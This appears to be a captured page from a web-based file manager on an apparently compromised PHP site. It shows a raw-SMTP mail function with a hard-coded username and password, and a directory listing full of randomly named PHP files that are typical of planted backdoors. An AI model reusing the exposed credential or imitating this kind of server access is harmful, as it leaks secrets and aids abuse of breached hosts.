PATH:
home
/
letacommog
/
facadierain
<?php function sendSMTP($to, $subject, $body, $from, $smtpHost, $smtpPort, $username, $password) { $socket = fsockopen($smtpHost, $smtpPort, $errno, $errstr, 15); if (!$socket) { return "Connection failed: $errstr ($errno)"; } $commands = [ "HELO " . gethostname(), "AUTH LOGIN", base64_encode($username), base64_encode($password), "MAIL FROM:<$from>", "RCPT TO:<$to>", "DATA", "Subject: $subject", "", $body, ".", "QUIT" ]; foreach ($commands as $cmd) { fwrite($socket, $cmd . "\r\n"); $response = fgets($socket, 512); if (strpos($response, '5') === 0) { // 5xx = error fclose($socket); return "SMTP error: " . $response; } } fclose($socket); return "Sent"; } // Example – Mailtrap echo sendSMTP( "joe@example.net", "Test from pure PHP", "Hello, this is sent without PHPMailer!", "from@example.com", "smtp.devmail.email", 2525, // or 587 or 465 "test-30", "n5hfZQZSxVDAag8r0pdK" );
[+]
..
[-] radio.php
[edit]
[-] k5ifr0bi.php
[edit]
[-] ugbidzzi.php
[edit]
[-] 33wiw29e.php
[edit]
[-] xczyi738.php
[edit]
[-] q2rj8eao.php
[edit]
[-] past1.php
[edit]
[-] wp-config.php1
[edit]
[-] uwdrzhag.php
[edit]
[-] 7zsmei2c.php
[edit]
[-] jytvfhlh.php
[edit]
[-] xphdvzfz.php
[edit]
[-] 37x4j9bl.php
[edit]
[-] rzhyqmcf.php
[edit]
[-] b26v037n.php
[edit]
[-] mxs9nbfu.php
[edit]
[-] uzpk5q2v.php
[edit]
[-] z2s56l38.php
[edit]
[-] 6saaie9y.php
[edit]
[-] d.php
[edit]
[-] 6gcy7tb3.php
[edit]
[-] x.php
[edit]
[-] olkycafm.php
[edit]
[-] zwzvzhuf.php
[edit]
[+]
assets
[-] radio.txt
[edit]
[-] dhi52pki.php
[edit]
[-] id9v5e6j.php
[edit]
[-] zyhvme12.php
[edit]
[-] izbcvwpg.php
[edit]
[-] zedoipqw.php
[edit]
[-] .htaccess
[edit]
[-] l6s4erbz.php
[edit]
[-] nkfngbxn.php
[edit]
[-] qj9wksoi.php
[edit]
[-] jaklzfte.php
[edit]
[-] yaps.php
[edit]
[-] o.php
[edit]
[-] byzchrtq.php
[edit]
[-] mail.php
[edit]
[-] wphe0hnv.php
[edit]
[-] rnqbcnev.php
[edit]
[-] fugveiqp.php
[edit]
[-] kacrjtjt.php
[edit]
[-] index.html
[edit]
[-] r0o5f9mz.php
[edit]
[-] sadtbusf.php
[edit]